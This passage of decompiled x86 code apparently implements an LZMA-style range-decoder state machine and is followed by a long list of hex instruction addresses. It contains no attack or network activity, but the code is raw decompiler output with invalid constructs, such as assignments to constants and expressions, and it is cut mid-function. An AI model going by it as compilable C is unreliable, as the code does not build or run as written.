											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                      0x004066ed
                                                                      0x004066ed
                                                                      0x004066ed
                                                                      0x004066ed
                                                                      0x004066f3
                                                                      0x004066f7
                                                                      0x004066fb
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a26
                                                                      0x00406a2f
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a7d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00406a7f
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00406b34
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x00406a02
                                                                      0x00406a08
                                                                      0x00406a0f
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00000000
                                                                      0x00406a1a
                                                                      0x00406a84
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406152
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615c
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061b7
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406201
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622b
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00000000
                                                                      0x00000000
